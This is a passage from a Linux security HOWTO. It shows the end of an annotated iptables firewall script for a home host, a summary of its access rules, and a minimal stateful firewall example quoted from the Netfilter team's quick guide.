   -j LOG --log-prefix "Blacklisted: "
 $IPTABLES -A INPUT -s $i -j DROP
done

## Trusted hosts/nets
#
# This is our trusted host list. These have access to everything.
for i in $TRUSTED; do
 $IPTABLES -A INPUT -s $i -j ACCEPT
done

# Port Forwarding
#
# Which ports get forwarded to which host. This is one to one
# port mapping (ie 80 -> 80) in this case.
[ -n "$FORWARD_HOST" ] &&\
 for i in $FORWARD_PORTS; do
   $IPTABLES -A FORWARD -p tcp -s $ANYWHERE -d $FORWARD_HOST \
     --dport $i -j ACCEPT
   $IPTABLES -t nat -A PREROUTING -p tcp -d $WAN_IP --dport $i \
     -j DNAT --to $FORWARD_HOST:$i
 done

## Open, but Restricted Access ports
#
# Allow DHCP server (their port 67) to client (to our port 68) UDP
# traffic from outside source.
[ -n "$DHCP_SERVER" ] &&\
 $IPTABLES -A INPUT -p udp -s $DHCP_SERVER --sport 67 \
   -d $ANYWHERE --dport 68 -j ACCEPT

# Allow 'identd' (to our TCP port 113) from mail server only.
[ -n "$MAIL_SERVER" ] &&\
 $IPTABLES -A INPUT -p tcp -s $MAIL_SERVER  -d $WAN_IP --dport 113 -j ACCEPT

# Open up Public server ports here (available to the world):
for i in $PUBLIC_PORTS; do
 $IPTABLES -A INPUT -p tcp -s $ANYWHERE -d $WAN_IP --dport $i -j ACCEPT
done

# So I can check my home POP3 mailbox from work. Also, so I can ssh
# in to home system. Only allow connections from my workplace's
# various IPs. Everything else is blocked.
$IPTABLES -A INPUT -p tcp -s 255.10.9.8/29 -d $WAN_IP --dport 110 -j ACCEPT

## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPTABLES -A INPUT  -p icmp  --icmp-type echo-reply \
   -s $ANYWHERE -d $WAN_IP -j ACCEPT
$IPTABLES -A INPUT  -p icmp  --icmp-type destination-unreachable \
   -s $ANYWHERE -d $WAN_IP -j ACCEPT
$IPTABLES -A INPUT  -p icmp  --icmp-type time-exceeded \
   -s $ANYWHERE -d $WAN_IP -j ACCEPT

# Identd Reject
#
# Special rule to reject (with rst) any identd/auth/port 113
# connections. This will speed up some services that ask for this,
# but don't require it. Be careful, some servers may require this
# one (IRC for instance).
#$IPTABLES -A INPUT -p tcp --dport 113 -j REJECT --reject-with tcp-reset

###################################################################
# Build a custom chain here, and set the default to DROP. All
# other traffic not allowed by the rules above, ultimately will
# wind up here, where it is blocked and logged, unless it passes
# our stateful rules for ESTABLISHED and RELATED connections. Let
# connection tracking do most of the worrying! We add the logging
# ability here with the '-j LOG' target. Outgoing traffic is
# allowed as that is the default policy for the 'output' chain.
# There are no restrictions placed on that in this script.

# New chain...
$IPTABLES -N DEFAULT
# Use the 'state' module to allow only certain connections based
# on their 'state'.
$IPTABLES -A DEFAULT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A DEFAULT -m state --state NEW -i ! $WAN_IFACE -j ACCEPT
# Enable logging for anything that gets this far.
$IPTABLES -A DEFAULT -j LOG -m limit --limit 30/minute --log-prefix "Dropping: "
# Now drop it, if it has gotten here.
$IPTABLES -A DEFAULT -j DROP

# This is the 'bottom line' so to speak. Everything winds up
# here, where we bounce it to our custom built 'DEFAULT' chain
# that we defined just above. This is for both the FORWARD and
# INPUT chains.

$IPTABLES -A FORWARD -j DEFAULT
$IPTABLES -A INPUT   -j DEFAULT

echo "Iptables firewall is up `date`."

##-- eof iptables.sh


-----------------------------------------------------------------------------

8.10.3. Summary

A quick run down of the some highlights...

We added some host based access control rules: "blacklisted", and "trusted".
We then showed several types of service and port based access rules. For
instance, we allowed some very restrictive access to bigcat's POP3 server so
we could connect only from our workplace. We allowed a very narrow rule for
the ISP's DHCP server. This rule only allows one port on one outside IP
address to connect to only one of our ports and only via the UDP protocol.
This is a very specific rule! We are being specific since there is no reason
to allow any other traffic to these ports or from these addresses. Remember
our goal is the minimum amount of traffic necessary for our particular
situation.

So we made those few exceptions mentioned above, and all other services
running on bigcat should be effectively blocked completely from outside
connections. These are still happily running on bigcat, but are now safe and
sound behind our packet filtering firewall. You probably have other services
that fall in this category as well.

We also have a small, home network in the above example. We did not take any
steps to block that traffic. So the LAN has access to all services running on
bigcat. And it is further "masqueraded", so that it has Internet access
(different HOWTO), by manipulating the "forward" chain. And the LAN is still
protected by our firewall since it sits behind the firewall. We also didn't
impose any restrictive rules on the traffic leaving bigcat. In some
situations, this might be a good idea.

Of course, this is just a hypothetical example. Your individual situation is
surely different, and would require some changes and likely some additions to
the rules above. For instance, if your ISP does not use DHCP (most do not),
then that rule would make no sense. PPP works differently and such rules are
not needed.

Please don't interpret that running any server as we did in this example is
necessarily a "safe" thing to do. We shouldn't do it this way unless a) we
really need to and b) we are running the current, safe version, and c) we are
able to keep abreast of security related issues that might effect these
services. Vigilance and caution are part of our responsibilities here too.
-----------------------------------------------------------------------------

8.10.4. iptables mini-me

Just to demonstrate how succinctly iptables can be configured in a minimalist
situation, the below is from the Netfilter team's Rusty's Really Quick Guide
To Packet Filtering:


    "Most people just have a single PPP connection to the Internet, and don't
    want anyone coming back into their network, or the firewall:"

 ## Insert connection-tracking modules (not needed if built into kernel).
 insmod ip_conntrack
 insmod ip_conntrack_ftp

 ## Create chain which blocks new connections, except if coming from inside.
 iptables -N block
 iptables -A block -m state --state ESTABLISHED,RELATED -j ACCEPT
 iptables -A block -m state --state NEW -i ! ppp0 -j ACCEPT
 iptables -A block -j DROP

 ## Jump to that chain from INPUT and FORWARD chains.
 iptables -A INPUT -j block
 iptables -A FORWARD -j block


This simple script will allow all outbound connections that we initiate, i.e.
any NEW connections (since the default policy of ACCEPT is not changed). Then
any connections that are "ESTABLISHED" and "RELATED" to these are also
allowed. And, any connections that are not incoming from our WAN side
interface, ppp0, are also allowed. This would be lo or possibly a LAN
interface like eth1. So we can do whatever we want, but no unwanted, incoming
connection attempts are allowed from the Internet. None.

This script also demonstrates the creation of a custom chain, defined here as
"block", which is used both for the INPUT and FORWARD chains.